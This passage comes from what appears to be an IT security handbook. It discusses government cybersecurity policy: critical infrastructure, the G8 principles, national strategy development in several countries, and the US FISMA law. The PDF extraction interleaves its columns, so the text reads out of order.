such as suspicious activity break-ins to make banks reconsider their overly simple reports are only useful when they are put into practice. authentication processes. There is also an over-reliance on Secure Sockets Layer (SSL) technology; SSL is very Second, information disclosure and transparency are limited because it only protects channels during trans- important for improving the systems of the future. It mission, and not end-to-end. Databases and other stor- was noted that incident cover-up is damaging because age units must be encrypted at all times to ensure secu- customers will go to the press. Instead, companies rity. Strong cryptography is required end-to-end and PIN should rectify the situations immediately ­ addressing numbers, for example, are done in a crypto box so that the problem directly with a plan of action is a better they are never in the clear. However, even then, PINs response to a security breach. Clearly there is a ques- are not protected enough, because they are short, and tion of how much to disclose and when to disclose it, can easily be captured by hackers. some guidelines for handling security incidents are offered in other parts of this Handbook. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 161 Third, most participating countries stressed the need for cross-border cooperation. One area of potentially fruitful collaboration lies in the use of certification programs. In this area, agencies should work with the software community in order to define the security needs of each sector. The EBG is one example of a network of commu- nications and outward dissemination and InfraGard, a public-private cooperative organization in the Federal Bureau of Investigation (FBI), is another. InfraGard includes all critical infrastructures, and approximately 10,000 members. The purpose of this organization is to generate trust, and to encourage information sharing among members. It is an example of how bridges must be created in the field of IT security. Fourth, roles and responsibilities in the matter of e-security liability must be established; fulfillment of fiduciary duty and maintaining a standard of care are very important for e-finance entities. The issues involved are deposits, public trust, and confidence in P the financial system. ART Finally, outsourcing was a major concern among participants. One example of the problems associated THREE with outsourcing took place in 2001 where a hosting company in the United States was hacked, resulting in a security compromise of over 300 banks. In closing, it is critical for regulators and supervisors to re-evaluate their regulatory umbrella, particularly in the case of third party money transmitters, such as hosting companies; further details on outsourcing may be found in this Handbook and other references cited in the Bibliography. 163 P A R T F O U R I N F O R M A T I O N S E C U R I T Y A N D G O V E R N M E N T P O L I C I E S CHAPTER 1. INTRODUCTION CHAPTER 2. PROTECTING GOVERNMENT SYSTEMS CHAPTER 3. THE ROLE OF LAW AND GOVERNMENT POLICY VIS A VIS THE PRIVATE SECTOR CHAPTER 4. GOVERNMENT CYBER-SECURITY POLICIES 164 INFORMATION SECURITY AND GOVERNMENT POLICIES CHAPTER 1. many of the computer systems of private companies and INTRODUCTION government agencies rely on the same hardware and software, designed and built by private companies. Thus, the picture is one of mutual interdependencies. As in other areas affecting the Internet, government policy has an important role to play in the promotion of IT For all of these reasons, responsibility for computer Security. There is a paradox, however: a sound public pol- security is shared between the government sector and the icy framework can enhance security, but ill-considered private sector. As a first priority, the government has a government regulation can do more harm than good. responsibility to "get its own house in order" ­ that is, to Technology is changing so rapidly and new cyber threats implement sound security practices for its own systems. are emerging with such swiftness that government In addition, it is universally recognized that the govern- regulation can become a straitjacket, impeding the ment should use the power of the criminal law to punish development and deployment of innovative responses. and deter intentional attacks on private sector as well as It is important therefore to achieve the right balance of on government computers. Beyond that, a growing number regulatory and non-regulatory measures. In seeking that of governments are concluding that they must undertake balance, policymakers should appreciate some defining additional responsibilities to promote sound computer characteristics of the Internet. Compared with earlier security practices in the private sector. The challenge is to information and communications technologies, cyber- adopt government policies that maximize the benefits of space is uniquely decentralized. The Internet's power government involvement without stifling innovation comes in part from the fact that it has no gatekeepers. through overbearing regulation and technology mandates. Most functionality is at the edges rather than at the Within a framework of partnership, the solution can be center of the network. Government cyber-security policies found in a balanced approach that includes: must take into account these features of the Internet. Within this context, there is a range of steps govern- ·Market forces that encourage private enterprises to ments can take to improve computer security, without address the security of their computer systems in order interfering with technical design decisions.108 to protect their profitability; ·The government's research and awareness-building While the picture varies from country to country, in most functions; countries some or all components of the communications ·Computer crime laws protecting both government and network and many of the critical infrastructures based on privately-owned computers and networks; computer systems (banking, transportation, energy, manu- ·Traditional concepts of legal liability translated to the facturing, etc.) are owned and operated by the private computer context; and sector. Therefore, much of the responsibility for ensuring ·Laws, regulations, and government policies that are the security of these systems lies with the private sec- specifically focused on promoting computer security. tor.109 However, these systems are critical to the national well-being and are interdependent in ways that implicate The issue of cybersecurity policy can be viewed as one broader public interests and justify government attention. component of the larger issue of the role of law in fos- Also, of course, the government has its own computer tering trust online. Creating an environment of trust in systems, including those that are crucial to national secu- cyberspace requires the adoption of laws and government rity, emergency services, health care, and other critical policies in other areas in addition to cyber-security. These functions. These systems, in turn, often depend in part on other areas include consumer protection, data and privately owned communications networks. By and large, 108 The following discussion draws upon the detailed surveys compiled by the American Bar Association's Privacy & Computer Crime Committee: Jody R. Westby, ed., International Guide to Combating Cybercrime, American Bar Association, Section of Science & Technology Law, Privacy & Computer Crime Committee, 2003 (Westby Guide), http://www.abanet.org/abapubs/books/cybercrime/; Jody R. Westby, ed., International Strategy for Cyberspace Security, American Bar Association, Section of Science & Technology Law, Privacy & Computer Crime Committee, 2003 (Westby Strategy). See also International Critical Information Infrastructure Protection Handbook, edited by Andreas Wenger, Jan Metzger and Myriam Dunn, Center for Security Studies and Conflict Research, Swiss Federal Institute of Technology (2002) http://www.isn.ethz.ch/crn. 109 In some countries, privatization is quite recent, meaning that operators, regulators and policymakers are struggling with the new problem of security at the same time they are grappling with the full range of transitional problems associated with privatization. Information Technology Security Handbook INFORMATION SECURITY AND GOVERNMENT POLICIES 165 communications privacy, intellectual property rights, and critical infrastructure, consisting of all the private banks, the framework for e-commerce. In the offline world, the the central bank, the securities exchange and commodities law weaves a web of rules and protections around com- markets, the payment clearinghouses, and other entities mercial and consumer transactions. Much of that same law involved in the flow of money and credit. In virtually every applies to cyberspace, but countries seeking to promote country in the world, these functions are dependent upon development of ICT need to assess whether there are gaps computers. The transportation network is another critical in their laws that fail to promote trust in ways that are infrastructure, consisting of roads, bridges, canals, rail- special to cyberspace. Indeed, countries eager to promote roads, and airports. The transportation infrastructure is e-commerce may find that their laws for financial services, largely physical and mechanical, but it too is increasingly intellectual property, and consumer protection do not pro- dependent on computers to operate traffic lights, to open vide sufficient confidence or protection for offline transac- and close bridges, to switch trains, and to control tions. The process of cyberlaw reform may occur as part of air traffic. broader legal reforms. This Handbook focuses on those laws and policies that directly concern attacks on comput- There is no common definition of critical infrastructure er systems, leaving to other resources (some of which are categories, and the list of "critical infrastructures" used by cited in Part 3 and the Annexes) the questions of the policymakers varies from country to country and from time broader enabling framework for ICT and e-commerce.110 to time. The U.S. government cyber-security strategy issued in February 2003 identifies thirteen critical infra- This Part, while it discusses initiatives taken in developing structure categories: 1) agriculture; 2) food; 3) water; 4) and transitional countries, focuses in some detail on the public health; 5) emergency services; 6) government; 7) programs and policies adopted by the most highly devel- defense industrial base; 8) information and telecommuni- oped countries and by multi-national organizations. To a cations; 9) energy; 10) transportation; 11) banking and large degree, this is where the action has been to date. finance; 12) chemicals and hazardous material; and 13) However, this focus on resources and models from devel- postal and shipping.111 By comparison, Canada's critical oped countries and international bodies should not deter infrastructure protection strategy uses only six categories: "the rest of the world." It is important that all countries 1) communications; 2) government, 3) energy and utili- develop, promote, and implement the necessary framework ties; 4) services (within which Canada includes financial for e-security. The budgetary and human resources avail- services, food distribution and health care); 5) safety; able are of course different, and developing countries may and 6) transportation.112 How a country defines "critical have to approach the issues at a more basic level, but the infrastructure" is not as important as the recognition of P principles outlined here are global in relevance. Cyberspace the concept itself. ART and cyber-insecurity are not limited by state boundaries. The concept of critical infrastructures is important for The Concept of Critical Infrastructures several reasons. First, it can help crystallize why computer security is important: policymakers may better grasp the FOUR In a number of countries, the development of government cyber-security problem if they understand that money will responses to the problem of computer security has been be frozen in banks, trains will not be able to leave their conceptualized in terms of "critical infrastructures." A crit- stations, and drinking water will not be pumped if certain ical infrastructure is some network of physical assets and computers fail. Second, infrastructure categories are operating systems that serves a function of critical impor- important insofar as they help define lines of responsibility tance to the economic or governmental well-being of a and communities of shared interest that need to work country. The financial services network, for example, is a together to improve security. For example, the electric 110The Global Internet Policy Initiative has a host of resources on the full range of policy issues affecting ICT development: http://www.internetpolicy.net. 111The National Strategy to Secure Cyberspace [United States], February 2003 http://www.whitehouse.gov/pcipb/; http://www.dhs.gov/interweb/assetli- brary/National_Cyberspace_Strategy.pdf. 112Office of Critical Infrastructure Protection and Emergency Preparedness [Canada] http://www.ocipep.gc.ca/home/index_e.asp. For descriptions of how various other countries have responded to critical infrastructure protection, see "International Critical Information Infrastructure Protection Handbook," edited by Andreas Wenger, Jan Metzger and Myriam Dunn, Center for Security Studies and Conflict Research, Swiss Federal Institute of Technology (2002) http://www.isn.ethz.ch/crn. 166 INFORMATION SECURITY AND GOVERNMENT POLICIES power industry and its government regulators can work appropriate, the disclosure of tracing information to together to good effect in addressing computer vulnera- other countries. bilities of the electric power system. Computer security VIII. Countries should conduct training and exercises measures, including the identification of best practices to enhance their response capabilities and to test and the sharing of information about vulnerabilities, continuity and contingency plans in the event of an can, to some extent, be developed and implemented information infrastructure attack and should encourage within the context of existing institutions created along stakeholders to engage in similar activities. industry lines. In the private sector, these institutions IX. Countries should ensure that they have adequate include trade associations, standards bodies, and other substantive and procedural laws, such as those out- self-regulatory bodies for various industries. On the lined in the Council of Europe Cybercrime Convention government side, many nations implement their cyber- of 23 November 2001, and trained personnel to enable security policies through existing ministries and regula- them to investigate and prosecute attacks on critical tory agencies that were created along sectoral lines many information infrastructures, and to coordinate such years ago (such as those that have traditionally regulated investigations with other countries as appropriate. the banking, telecommunications, and energy sectors). X. Countries should engage in international coopera- tion, when appropriate, to secure critical information Currently there are a number of broad initiatives to infrastructures, including by developing and coordinat- stimulate a greater degree of cross-border cooperation ing emergency warning systems, sharing and analyzing in these areas. For example, in May of 2003, the G8 information regarding vulnerabilities, threats, and inci- adopted eleven principles to consider when developing dents, and coordinating investigations of attacks on a strategy for reducing risks to critical information such infrastructures in accordance with domestic laws. infrastructure: XI. Countries should promote national and international (See http://www.cybersecuritycooperation.org/docu- research and development and encourage the appli- ments/G8_CIIP_Principles.pdf.) cation of security technologies that are certified according to international standards. I. Countries should have emergency warning networks regarding cyber vulnerabilities, threats, and incidents. Computer security is characterized by interrelationships II. Countries should raise awareness to facilitate across sectors, including similar or identical hardware and stakeholders' understanding of the nature and extent software and dependency on a common communications of their critical information infrastructures, and the network. Therefore, governments must design policies that role each must play in protecting them. ensure sharing of information about vulnerabilities and III. Countries should examine their infrastructures solutions across infrastructure categories. This can be and identify interdependencies among them, thereby greatly facilitated by the designation of centralized lead- enhancing protection of such infrastructures. ership within the government to coordinate cyber-security IV. Countries should promote partnerships among policies and programs; we will return to this point later. stakeholders, both public and private, to share and analyze critical infrastructure information in order to prevent, investigate, and respond to damage to or attacks on such infrastructures. V. Countries should create and maintain crisis communication networks and test them to ensure that they will remain secure and stable in emergency situations. VI. Countries should ensure that data availability policies take into account the need to protect critical information infrastructures. VII. Countries should facilitate tracing attacks on critical information infrastructures and, where Information Technology Security Handbook INFORMATION SECURITY AND GOVERNMENT POLICIES 167 CHAPTER 2. an economic, national security, or law PROTECTING GOVERNMENT SYSTEMS enforcement problem? · Canada has put much of the authority for cyber- All of the issues pertaining to small and medium security in its Ministry National Defence.113 sized enterprises that are covered in Part 3 are equally · In the United Kingdom, the Home Office, which is applicable to government systems. Just as an enterprise mainly a law enforcement ministry, has the lead.114 needs to protect itself, its suppliers, and its customers, · The United States has put the issue within the newly the government must protect its systems and its citizens created Department of Homeland Security, but con- from security threats, both physically and in cyberspace. sciously left the Computer Security Division of the Local and national governments cannot afford to have National Institute of Standards and Technology major crises such as interruption of operations that are under the Commerce Department.115 based on computers, loss of confidential data, or theft · Australia has created an E-Security Coordination of computing resources. Security incidents that are well- Group to coordinate cybersecurity policy,, an inter- publicized lead to a diminution of public trust and present agency body chaired by the National Office for the an obstacle to promotion of e-government initiatives. Information Economy, which is an Executive Therefore, government's first responsibility in terms of Agency116 under the Minister for Communications, computer security is probably to "get its own house in Information Technology and the Arts. order," meaning that government agencies at all levels · Italy has established an Interministerial Committee (national, provincial, and local) must protect the computer for Responsible Use of the Internet, managed by the systems that they own and operate. These include the Department of Innovation and Technologies in the computer systems used by government agencies or min- Prime Minister's Office. istries, including national defense authorities, law · In Japan, in 2000, the Prime Minister established a enforcement, public health and safety and emergency branch for IT security in the Cabinet Office in order response agencies, and central banks. Government- to better coordinate security policy and measures owned infrastructures that are dependent on computers among ministries and agencies. The branch is com- may also include water systems, hydroelectric dams, the posed of experts from concerned ministries and air traffic control system, and other facilities, depending agencies and from the private sector.117 on what is privatized and what is government owned. Leadership and Organization The choice of where within government to place cyber- P security leadership can be significant. For example, the ART issues surrounding the sharing of information about Computer security poses leadership and organizational cyber-security vulnerabilities and when to disclose vul- challenges within government. For purposes of defining nerabilities to the public require a balancing of interests. responsibilities within government, is computer security Placing responsibility for cyber-security within the FOUR 113Canada's Office of Critical Infrastructure Protection and Emergency Preparedness is a civilian organization operating within the Ministry of National Defence. 114The U.K.'s Home Office has created a National Infrastructure Security Coordination Centre (NISCC) to coordinate critical infrastructure protection issues, provide alerts and attack response assistance, and facilitate public-private relationships to protect infrastructure. Within NISCC, there is a Computer Emergency Response Team, known as UNIRAS. An Electronic Attack Response Group (EARG) is also within NISCC to provide assistance to critical infrastruc- ture organizations and government departments that suffer an attack. UNIRAS will provide an early warning and alert service to all UK businesses. The NISCC website (http://www.niscc.gov.uk) provides detailed information on the British government's approach. 115In some ways, the United States is a complex model of coordination, and may therefore be of limited utility as an example for developing countries. The Homeland Security Act of 2002 places responsibility for security of both government and private sector computer systems in the Department of Homeland Security, but the Federal Information Security Management Act of 2002 gives the Office of Management and Budget in the White House respon- sibility for overseeing security of government computer systems, and a Homeland Security Council in the White House also has responsibility for coordinat- ing cybersecurity policy. 116Under Australian law, Executive Agencies are non-statutory bodies established by the Governor-General when a degree of independence within the gov- ernmental structure is needed and when the functions of the agency require a government-wide approach. The head of an Executive Agency is appointed by, and directly accountable to a Minister, in this case the Minister for Communications, Information Technology and the Arts. See http://www.noie.gov.au/Projects/confidence/Protecting/nat_agenda.htm. 117See http://www.kantei.go.jp/foreign/it/security/2000/0519taisei.html. 168 INFORMATION SECURITY AND GOVERNMENT POLICIES defense ministry, which likely has a tradition of national scholarships for computer security studies, where the security secrecy, may hamper information sharing and scholarships require graduates to work a certain number produce a policy that does not sufficiently promote public of years for the government. A short-term solution may awareness. Since public-private partnership is a major be a secondment program with the private sector where- component of what we believe to be the most effective by corporate cyber-security experts are loaned to the computer security strategy, leadership for cyber-security government but paid in whole or in part by their private may better be placed within an economic affairs agency sector employers. For both developed and developing or an intergovernmental body under the nation's countries, the problem of human resources in cyber- chief executive. security may be a manifestation of the government's broader difficulty in paying salaries competitive But more important than the question of which agency with the private sector in order to attract qualified, or agencies should be given responsibility for computer committed employees. security is the point that some national leadership should be designated to ensure that computer security will Developing a National Cyber-Security receive government-wide attention. There are important Strategy organizational questions to be considered when it comes to getting powerful existing ministries to address computer The process of developing a "national cyber-security security. If the agency with cyber-security leadership is strategy" can be an effective means of deciding what a granted only the powers of persuasion and publicity, its nation's cyber-security vulnerabilities are, what the ability to improve security in other ministries may be government's responsibilities should be, and what poli- limited. Therefore, mechanisms should be considered that cies and legal reforms need to be adopted. A national give the office charged with cyber-security leadership the cyber-security strategy can also define the relationship authority to require other ministries and departments to of the government to the private sector. Here we will address the security of their own systems. The ultimate focus mainly on the elements of a cyber-security power to require ministries to comply with computer strategy that concern protecting the government's own security standards may be the authority to disapprove computers. Later on in Part 4, we will discuss the role those government agencies' computer purchases that do of the government in improving the security of private not meet security standards. sector systems. The U.S. strategy explains the reason for the distinction: To some extent, the United States has taken this approach, giving its Office of Management and Budget "In general, the private sector is best equipped and in the Office of the President authority to approve or structured to respond to an evolving cyber threat. disapprove expenditure of funds for computer systems There are specific instances, however, where federal based on various considerations, including security. government response is most appropriate and justi- Other less drastic measures include requiring fied. Looking inward, providing continuity of govern- ministries and government agencies to conduct ment requires ensuring the safety of [the govern- annual cyber-security audits and report the results ment's] own cyber infrastructure and those assets to the cyber-security office. Whatever structures are required for supporting its essential missions and chosen, leadership from the office of the president or services. Externally, a government role in cyber-securi- prime minister will probably be needed to ensure that ty is warranted in cases where high transaction costs all departments are taking the issue seriously. or legal barriers lead to significant coordination prob- lems; cases in which governments operate in the Another organizational challenge for government is the absence of private sector forces; resolution of incen- problem of human resources: Governments may find it tive problems that lead to under provisioning of critical hard to attract and retain well-qualified computer security shared resources; and raising awareness."118 personnel. Effective responses may include college 118The National Strategy to Secure Cyberspace [United States], February 2003, p. ix, http://www.whitehouse.gov/pcipb/; http://www.dhs.gov/interweb/assetlibrary/National_Cyberspace_Strategy.pdf. Information Technology Security Handbook INFORMATION SECURITY AND GOVERNMENT POLICIES 169 To date, the United States has had probably the most and that no formal structure existed for the coordination extensive and most transparent process of developing a and implementation of government policy for protecting national cyber-security strategy, but the same themes critical infrastructures.121 In the United States, to study emerge in the initiatives of other countries and interna- the issue, the President appointed a board of corporate tional bodies. While details of the process and of the and government officials, known as the President's resulting organizational structures and laws will vary Critical Infrastructure Protection Board in 1996. The from country to country, the process of developing a board had no regulatory powers and was not a perma- cyber-security strategy is similar to that which many nent body. It conducted hearings, interviews, countries have undertaken in developing national ICT and research and issued a report that described the strategies.119 Indeed, security is best seen as a compo- problem and drew the attention of policymakers, nent of a nation's ICT strategy, and a cyber-security corporate officials, the media and the public. strategy can be developed with the same institutions The Board presented its report in October 1997, and mechanisms used to develop a nation's basic pro- calling for closer cooperation between the private gram for ICT development. Japan, for example, has sector and the government and making numerous incorporated cyber-security into its "e-Japan Priority specific recommendations. Policy Program" of March 2001.120 The second phase is to create some permanent structure Looking at the experiences of those countries that within the executive branch to coordinate policy have developed national cyber-security strategies, development and implementation. In Canada, for some common elements or phases emerge: example, following the issuance of an assessment by an inter-departmental Critical Infrastructure Protection 1.Assessment of national vulnerabilities and issuance Task Force, the government created an Information of a public report that conceptualizes the issue and Protection Coordination Centre to collect information, raises awareness of policymakers and the public; assess threats, and analyze incidents and an Office of 2.Creation of a leadership structure within the executive Critical Infrastructure Protection and Emergency branch to oversee the development and Preparedness to provide national leadership on critical implementation of policy; infrastructure protection issues.122 3.Drafting of a detailed national plan based on dialogue with the private sector; In the United States, Presidents Clinton 4.Adoption of legislation and guidelines addressing such and Bush issued a series of executive directives P questions as information sharing and accountability. establishing policymaking and oversight bodies ART within the executive branch of the federal government. The first phase is to broadly assess vulnerabilities and The directives called for the development of a national raise awareness. Australia, for example, published the plan for infrastructure protection.123 These Presidential report "Australia's National Information Infrastructure: orders did not give federal agencies authority over FOUR Threats and Vulnerabilities" in 1997. The report, pre- the systems of the private sector; instead, they pared by the Defence Signals Directorate, concluded emphasized public-private partnership and information that Australian society was vulnerable to significant sharing. Other leadership structures are discussed disruption due to vulnerabilities in computer networks above under "Leadership and Organization." 119For descriptions of how various other countries developed their cyber-security strategies, see International Critical Information Infrastructure Protection Handbook, edited by Andreas Wenger, Jan Metzger and Myriam Dunn, Center for Security Studies and Conflict Research, Swiss Federal Institute of Technology (2002) http://www.isn.ethz.ch/crn. 120http://www.kantei.go.jp/foreign/it/network/priority-all/index.html. 121See International Critical Information Infrastructure Protection Handbook, edited by Andreas Wenger, Jan Metzger and Myriam Dunn, Center for Security Studies and Conflict Research, Swiss Federal Institute of Technology (2002), p. 18, http://www.isn.ethz.ch/crn. 122Office of Critical Infrastructure Protection and Emergency Preparedness [Canada], http://www.ocipep.gc.ca/critical/nciap/disc_e.asp. 123President Clinton issued Presidential Decision Directive (PDD) 63: Critical Infrastructure Protection, May 22, 1998, http://www.fas.org/irp/offdocs/pdd- 63.htm and PDD 62: Protection Against Unconventional Threats to the Homeland and Americans Overseas, May 22, 1998, http://www.fas.org/irp/offdocs/pdd-62.htm. In the aftermath of September 11, 2001, President Bush signed two executive orders reallocating functions and creating new entities within the executive branch responsible for critical infrastructure protection. E.O. 13228, Establishing the Office of Homeland Security and the Homeland Security Council, October 8, 2001, http://fas.org/irp/offdocs/eo/eo-13228.htm; E.O. 13231, Critical Infrastructure Protection in the Information Age, October 16, 2001, http://www.ciao.gov/News/EOonCriticalInfrastrutureProtection101601.html. 170 INFORMATION SECURITY AND GOVERNMENT POLICIES The third phase involves the development of the corporations were consulted. Other national cyber strategy itself. As noted above, a national cyber- strategies include that of Australia.126 security strategy can be a free-standing document or it can be part of the nation's overall ICT strategy. Other strategy efforts have been undertaken at a A key to this process is dialogue between government regional level. The European Union has developed and the private sector. In Japan, which has incorporat- a cyber-security strategy not in a single document, ed cyber-security into its overall ICT strategy, the but rather in a series of Communications and proposals process was carried out jointly by the "IT Strategy from the Commission and a Council resolution, issued Headquarters" established within the Cabinet and the over a period of years.127 The Asia Pacific Economic "IT Strategy Council," made up of 20 opinion leaders, Cooperation (APEC) forum has adopted a regional which was established in order to combine private- cyber-security strategy, drafted by the Telecommunications and public-sector strengths.124 In the United States, and Information Working Group (TEL) with active the cyber-security strategy is a free-standing document. participation of the private sector.128 The Organization of American States (OAS) has undertaken regional work Development of the U.S. cyber-security strategy as well.129 In June 2003, the OAS General Assembly involved a lengthy process of public dialogue, managed approved a resolution calling for development of an by the staff of the National Security Council. The first inter-American strategy against threats to computer version of the strategy was issued in 2000. A revised information systems and networks.130 The Organization plan was published in draft in the fall of 2002 and in for Economic Cooperation and Development (OECD) has final form in February 2003.125 At all stages of the issued a set of Guidelines that constitute a roadmap for process, the U.S. plans were drafted on the basis of governments (and private enterprises) in developing extensive consultations within government and cybersecurity strategies.131 between the government and the private sector. Ten public meetings were held in major cities around the A consistent set of themes emerges from these national, country to gather input on the development of the regional and international cyber-security strategies: strategy. Civil society groups, trade associations and 124"e-Japan Priority Policy Program," March 29, 2001, http://www.kantei.go.jp/foreign/it/network/priority-all/index.html. 125The final version is The National Strategy to Secure Cyberspace, Feb. 14, 2003: http://www.dhs.gov/interweb/assetlibrary/National_Cyberspace_Strategy.pdf. The National Strategy to Secure Cyberspace was supplemented by The National Strategy for the Physical Protection of Critical Infrastructures and Key Assets, released March 4, 2003, http://www.dhs.gov/interweb/assetli- brary/Physical_Strategy.pdf. Both of these documents are implementing components of The National Strategy for Homeland Security, issued by the White House on July 16, 2002. 126E-Security National Agenda [Australia], September 2001 http://www.noie.gov.au/projects/confidence/Protecting/nat_agenda.htm. 127European Commission, Proposal for a Regulation of the European Parliament and of the Council - Establishing the European Network and Information Security Agency, Feb. 11, 2003, COM(2003) 63 final, 2003/0032 (COD), http://europa.eu.int/information_society/eeurope/action_plan/safe/documents/nisa_en.pdf; Council of the European Union, Council Resolution of 28 January 2002 on a common approach and specific actions in the area of network and information security, (2002/C 43/02), http://www.europa.eu.int/information_society/eeurope/action_plan/safe/netsecres_en.pdf; European Commission, Proposal for a Council Framework Decision on attacks against information systems, Apr. 19, 2002, COM(2002) 173 final, 2002/0086 (CNS), http://europa.eu.int/eur- lex/en/com/pdf/2002/com2002_0173en01.pdf; European Commission, Communication from the Commission to the Council, the European Parliament, the European Economic And Social Committee and the Committee of the Regions - Network and Information Security: Proposal for a European Policy Approach, June 6, 2001, COM (2001) 298 final, http://europa.eu.int/information_society/eeurope/news_library/new_documents/index_en.htm; European Commission, Communication from the Commission to the Council, the European Parliament, the Economic and Social Committee and the Committee on the Regions - Creating a Safer Information Society by Improving the Security of Information Infrastructures and Combating Computer-related Crime, Jan. 26, 2001, COM(20000) 890 final, http://europa.eu.int/ISPO/eif/InternetPoliciesSite/Crime/CrimeCommEN.html. 128Available at: http://www.apecsec.org.sg/content/apec/apec_groups/working_groups/telecommunications_and_information.html. In October 2002, APEC Ministers underscored the importance of protecting the integrity of APEC's communications and information systems while allowing the free flow of infor- mation. In responding to this challenge, they supported the TEL cyber-security strategy and instructed officials to implement it. http://203.127.220.67/apec/ministerial_statements/annual_ministerial/2002_14th_apec_ministerial.html#policies. 129The OAS's initial work focused on cybercrime. See material compiled at http://www.oas.org/juridico/english/cyber_experts.htm. 130Development of an Inter-American Strategy to Combat Threats to Cybersecurity, AG/RES. 1939 (XXXIII-O/03) (Resolution adopted at the fourth plenary session, held on June 10, 2003) http://www.oas.org/main/main.asp?sLang=E&sLink=http://www.oas.org/documents/eng/documents.asp. 131Organization for Economic Cooperation and Development, OECD Guidelines for the Security of Information Systems and Networks: Towards a Culture of Security, July 25, 2002, http://www.oecd.org/pdf/M00034000/M00034292.pdf; "Implementation Plan for the OECD Guidelines for the Security of Information Systems and Networks: Towards a Culture of Security," Organization for Economic Cooperation and Development, Working Party on Information Security and Privacy, DSTI/ICCP/REG(2002)6/FINAL, Jan. 21, 2003, http://www.olis.oecd.org/olis/2002doc.nsf/LinkTo/dsti-iccp-reg(2002)6-final. Information Technology Security Handbook INFORMATION SECURITY AND GOVERNMENT POLICIES 171 ·Public-Private Partnership: Effective cybersecurity ·Training and Education: The APEC Strategy states, requires a public-private partnership.132 The private "The development of the human resources is critical sector has primary responsibility for ensuring the to the success of efforts to improve security. In security of its systems and networks. order to achieve cybersecurity, governments and cor- porations must have personnel trained in the com- ·Public Awareness: "Participants in a network, plex technical and legal issues raised by cybercrime whether as developer, owner, operator, or individual and critical infrastructure protection. user, must be aware of the threats to and vulnerabil- ities of the network and assume responsibility for ·Respect for Privacy: ICT networks transmit and protecting that network according to their position store communications and personal information of and role."133 the most sensitive character. Privacy is a crucial component of trust in cyberspace and cybersecurity ·Best Practices, Guidelines and International strategies must be implemented in ways compatible Standards: Cybersecurity should be based on the with the essential values of a democratic society.135 growing number of voluntary, consensus-based stan- dards and best practices being developed through ·Vulnerability Assessment, Warning and Response: international standards bodies and cooperative insti- As the APEC strategy puts it: "Successfully combating tutions. These standards are crucial guides to gov- cybercrime and protecting information infrastructures ernments' internal policies. Governments need not depends upon economies having in place systems for and should not mandate technical standards for the evaluating threats and vulnerabilities and issuing private sector.134 required warnings and patches. By identifying and sharing information on a threat before it causes wide- ·Information Sharing: It is widely recognized spread harm, networks...can be better protected."136 that cyber-security efforts have been hampered The United States Strategy calls for the creation of a by system operators' reluctance to disclose National Cyberspace Security Response System to vulnerabilities and attacks. Sharing of information rapidly identify attacks on computer networks. should be encouraged among private sector entities, between the private sector and the government, and internationally. P ART 130Development of an Inter-American Strategy to Combat Threats to Cybersecurity, AG/RES. 1939 (XXXIII-O/03) (Resolution adopted at the fourth plenary session, held on June 10, 2003) http://www.oas.org/main/main.asp?sLang=E&sLink=http://www.oas.org/documents/eng/documents.asp. 131Organization for Economic Cooperation and Development, OECD Guidelines for the Security of Information Systems and Networks: Towards a Culture of Security, July 25, 2002, http://www.oecd.org/pdf/M00034000/M00034292.pdf; "Implementation Plan for the OECD Guidelines for the Security of FOUR Information Systems and Networks: Towards a Culture of Security," Organization for Economic Cooperation and Development, Working Party on Information Security and Privacy, DSTI/ICCP/REG(2002)6/FINAL, Jan. 21, 2003, http://www.olis.oecd.org/olis/2002doc.nsf/LinkTo/dsti-iccp-reg(2002)6-final. 132See, e.g., APEC, "Statement on the Security of Information and Communications Infrastructure," Fifth APEC Ministerial Meeting on Telecommunications and Information Industry, Shanghai, China, May 29-30, 2002, http://www.apecsec.org.sg/virtualib/minismtg/telminAnnexB_SICI.html. Canada's National Critical Infrastructure Assurance Program Discussion Paper emphasizes public/private sector interaction and cooperation. http://www.ocipep.gc.ca/critical/nciap/disc_e.asp (Draft), Nov. 1, 2002. Article 7 of Japan's Basic Law on the Formation of an Advanced Information and Telecommunications Network Society specifies that the private sector is to take the lead in forming an advanced information and telecommunications net- work, with the state and local governments implementing supportive measures to ensure the private sector can exert its full potential. Basic Law on the Formation of an Advanced Information and Telecommunications Network Society, Law No. 144 of 2000, Nov. 2000, http://www.kantei.go.jp/foreign/it/it_basiclaw/it_basiclaw.html. 133APEC Cybersecurity Strategy, http://www.apecsec.org.sg/content/apec/apec_groups/working_groups/telecommunications_and_information.html. See also, Council of the European Union, Council Resolution of 28 January 2002 on a common approach and specific actions in the area of network and informa- tion security, (2002/C 43/02), http://www.europa.eu.int/information_society/eeurope/action_plan/safe/netsecres_en.pdf. Awareness is a major theme as well of the OECD guidelines and the work of the G8. 134For example, while the U.S. strategy addresses both government systems and privately owned and operated infrastructures, it concludes that the gov- ernment should not dictate security standards for private sector systems. The National Strategy to Secure Cyberspace, February 2003, pp. 11, 15, http://www.whitehouse.gov/pcipb/; http://www.dhs.gov/interweb/assetlibrary/National_Cyberspace_Strategy.pdf. 135 Principle 5 of the OECD Guidelines is "Democracy." OECD Guidelines for the Security of Information Systems and Networks: Towards a Culture of Security, July 25, 2002, http://www.oecd.org/pdf/M00034000/M00034292.pdf. Protection of privacy and civil liberties is a guiding principle of the U.S. strategy. The National Strategy to Secure Cyberspace [United States], February 2003, p. 4, http://www.whitehouse.gov/pcipb/; http://www.dhs.gov/interweb/assetli- brary/National_Cyberspace_Strategy.pdf. 136APEC Cybersecurity Strategy, http://www.apecsec.org.sg/content/apec/apec_groups/working_groups/telecommunications_and_information.html. 172 INFORMATION SECURITY AND GOVERNMENT POLICIES ·International Cooperation: Governments should government computer systems, Congress adopted the work together to develop compatible cybercrime Federal Information Security Management Act (FISMA) laws and law enforcement cooperation and of 2002, strengthening requirements and oversight should work through international organizations mechanisms within the federal government.139 A similar to facilitate dialogue and partnerships among approach has been followed in Tunisia, where the gov- international public and private sectors focused ernment in 2002 adopted security regulations that on protecting promoting a global "culture require government agencies to perform an annual security of security."137 audit of their computer systems. The process of developing and implementing a Structuring Responsibility: Implementing cyber-security strategy for a government has many a Cyber-Security Strategy for Government of the same elements as the development and Systems ­ The U.S. Approach implementation of a computer security program for a corporate enterprise: In the United States, policy for addressing the security of the federal government's own information systems is · Assess vulnerabilities. defined in greater detail and implemented through the · Raise awareness. Federal Information Security Management Act, adopted · Designate program leadership to serve as policy in 2002.140 The law illustrates some of the ways in which coordinator and for oversight. accountability can be built into implementation of · Develop a risk management program. cyber-security across multiple agencies. · Adopt appropriate security guidelines. · Structure accountability. The stated purpose of FISMA is to provide · Periodically reassess and continuously improve. government-wide management and oversight of computer security, including coordination of information The fourth phase 